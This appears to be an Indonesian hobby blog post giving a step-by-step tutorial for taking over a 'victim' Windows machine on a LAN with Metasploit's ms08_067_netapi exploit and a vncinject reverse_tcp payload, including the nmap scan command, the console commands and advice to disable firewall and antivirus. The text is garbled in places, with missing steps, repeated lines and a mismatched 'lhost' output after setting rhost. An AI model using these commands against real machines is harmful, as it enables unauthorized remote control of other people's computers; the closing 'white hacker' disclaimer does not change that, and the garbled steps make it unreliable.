Exploit adalah memanfaatkan kelemahan sistem untuk aktifitas-aktifitas di luar penggunaan yang wajar. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan. Bisa juga dikatakan sebuah perangkat lunak yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan.
Ok, langsung saja tanpa basa-basi sobat blogger. Sebelum melancarkan misi,sebaiknya download dahulu tool metasploit disini.. dan tool nmap dimari..
3. Jalankan software metasploitnya.
Ok, langsung saja tanpa basa-basi sobat blogger. Sebelum melancarkan misi,sebaiknya download dahulu tool metasploit disini.. dan tool nmap dimari..
Sebelum melakukan misi, sebaiknya firewall dan antivirus didisable terlebih dahulu supaya tool bekerja secara maksimal. Tutorial ini bekerja pada jarinngan LAN.
Setelah selesai download, langsung install software di kompie sobat blogger..
Jika semua sudah beres,ikuti langkah berikut ini:
- Cari IP korban. Bisa menggunakan chain abel, netscan, netcut, dll.
- Jika sudah, scan IP korban menggunakan nmap. Ex: nmap -v -O -p445 ip target.
 | |
| keterangan: -v = verbose, -O = lihat informasi OS korban, -p445 = mencari info port 445 |
4. Klik windows, lalu pilih console.
5. Ketik "use windows/smb/ms08_067_netapi"
 |
| Lalu ketik "show payloads" untuk melihat payload - paayload yang ada. |
6. Ada tulisan "windows/vncinject/reverse_tcp" nah ini yang akan kita manfaatkan.
ketik "set PAYLOAD windows/vncinject/reverse_tcp"
sampai kluar tulisan "PAYLOAD => windows/vncinject/reverse_tcp"
7. Ketik "set rhost ip korban"
sampai keluar tulisan "lhost => ip korban"
terus ketik lagi "lhost ip kita"
sampe keluar tulisan "lhost => ip kita"
terus ketik lagi "lhost ip kita"
sampe keluar tulisan "lhost => ip kita"
8. Terakhir ketik "exploit" tunggu sampe keluar tab baru pada taskbar.
Selesai deh ^.^. Tutorial exploit ini saya ambil salah satu dari berbagai macam cara exploit. Selanjutnya saya tidak bertanggung jawab atas dampak yang ditimbulkan apabila sobat blogger menyalahgunakannya. Pesan saya tetap think positive dan jadilah white hacker yang selalu memajukan dunia Network Security.
Tidak ada komentar:
Posting Komentar